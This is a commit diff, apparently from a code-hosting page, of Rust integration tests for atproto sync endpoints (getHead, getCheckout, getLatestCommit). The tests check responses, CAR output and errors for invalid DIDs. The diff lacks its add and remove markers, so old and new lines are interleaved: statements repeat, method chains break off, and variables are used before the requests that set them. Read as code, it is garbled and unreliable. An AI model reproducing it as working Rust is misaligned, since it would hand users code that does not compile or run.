||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_changes_after_record_create() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("gethead-changes").await;
|
||||
let res1 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
let root1 = body["root"].as_str().unwrap().to_string();
|
||||
assert!(root1.starts_with("bafy"), "Root CID should be a CID");
|
||||
let latest_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base_url().await))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get initial head");
|
||||
let body1: Value = res1.json().await.unwrap();
|
||||
let head1 = body1["root"].as_str().unwrap().to_string();
|
||||
.send().await.expect("Failed to get latest commit");
|
||||
let latest_body: Value = latest_res.json().await.unwrap();
|
||||
let latest_cid = latest_body["cid"].as_str().unwrap();
|
||||
assert_eq!(root1, latest_cid, "getHead root should match getLatestCommit cid");
|
||||
create_post(&client, &did, &jwt, "Post to change head").await;
|
||||
let res2 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get head after record");
|
||||
.send().await.expect("Failed to get head after record");
|
||||
let body2: Value = res2.json().await.unwrap();
|
||||
let head2 = body2["root"].as_str().unwrap().to_string();
|
||||
assert_ne!(head1, head2, "Head CID should change after record creation");
|
||||
let root2 = body2["root"].as_str().unwrap().to_string();
|
||||
assert_ne!(root1, root2, "Head CID should change after record creation");
|
||||
let not_found_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
|
||||
.query(&[("did", "did:plc:nonexistent12345")])
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST);
|
||||
let error_body: Value = not_found_res.json().await.unwrap();
|
||||
assert_eq!(error_body["error"], "HeadNotFound");
|
||||
let missing_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
|
||||
let empty_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
|
||||
.query(&[("did", "")])
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST);
|
||||
let whitespace_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
|
||||
.query(&[("did", " ")])
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_success() {
|
||||
async fn test_get_checkout_comprehensive() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("getcheckout-success").await;
|
||||
let (did, jwt) = setup_new_user("getcheckout").await;
|
||||
let empty_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(empty_res.status(), StatusCode::OK);
|
||||
let empty_body = empty_res.bytes().await.expect("Failed to get body");
|
||||
assert!(!empty_body.is_empty(), "Even empty repo should return CAR header");
|
||||
create_post(&client, &did, &jwt, "Post for checkout test").await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
assert_eq!(
|
||||
res.headers()
|
||||
.get("content-type")
|
||||
.and_then(|h| h.to_str().ok()),
|
||||
Some("application/vnd.ipld.car")
|
||||
);
|
||||
assert_eq!(res.headers().get("content-type").and_then(|h| h.to_str().ok()), Some("application/vnd.ipld.car"));
|
||||
let body = res.bytes().await.expect("Failed to get body");
|
||||
assert!(!body.is_empty(), "CAR file should not be empty");
|
||||
assert!(body.len() > 50, "CAR file should contain actual data");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_not_found() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", "did:plc:nonexistent12345")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::NOT_FOUND);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert_eq!(body["error"], "RepoNotFound");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_missing_param() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_empty_did() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", "")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_empty_repo() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("getcheckout-empty").await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body = res.bytes().await.expect("Failed to get body");
|
||||
assert!(!body.is_empty(), "Even empty repo should return CAR header");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_includes_multiple_records() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("getcheckout-multi").await;
|
||||
for i in 0..5 {
|
||||
assert!(body.len() >= 2, "CAR file should have at least header length");
|
||||
for i in 0..4 {
|
||||
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
|
||||
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
|
||||
}
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
let multi_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body = res.bytes().await.expect("Failed to get body");
|
||||
assert!(body.len() > 500, "CAR file with 5 records should be larger");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_matches_latest_commit() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
|
||||
let head_res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get head");
|
||||
let head_body: Value = head_res.json().await.unwrap();
|
||||
let head_root = head_body["root"].as_str().unwrap();
|
||||
let latest_res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getLatestCommit",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get latest commit");
|
||||
let latest_body: Value = latest_res.json().await.unwrap();
|
||||
let latest_cid = latest_body["cid"].as_str().unwrap();
|
||||
assert_eq!(
|
||||
head_root, latest_cid,
|
||||
"getHead root should match getLatestCommit cid"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_checkout_car_header_valid() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("getcheckout-header").await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getCheckout",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body = res.bytes().await.expect("Failed to get body");
|
||||
assert!(
|
||||
body.len() >= 2,
|
||||
"CAR file should have at least header length"
|
||||
);
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(multi_res.status(), StatusCode::OK);
|
||||
let multi_body = multi_res.bytes().await.expect("Failed to get body");
|
||||
assert!(multi_body.len() > 500, "CAR file with 5 records should be larger");
|
||||
let not_found_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
|
||||
.query(&[("did", "did:plc:nonexistent12345")])
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
|
||||
let error_body: Value = not_found_res.json().await.unwrap();
|
||||
assert_eq!(error_body["error"], "RepoNotFound");
|
||||
let missing_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
|
||||
let empty_did_res = client
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
|
||||
.query(&[("did", "")])
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user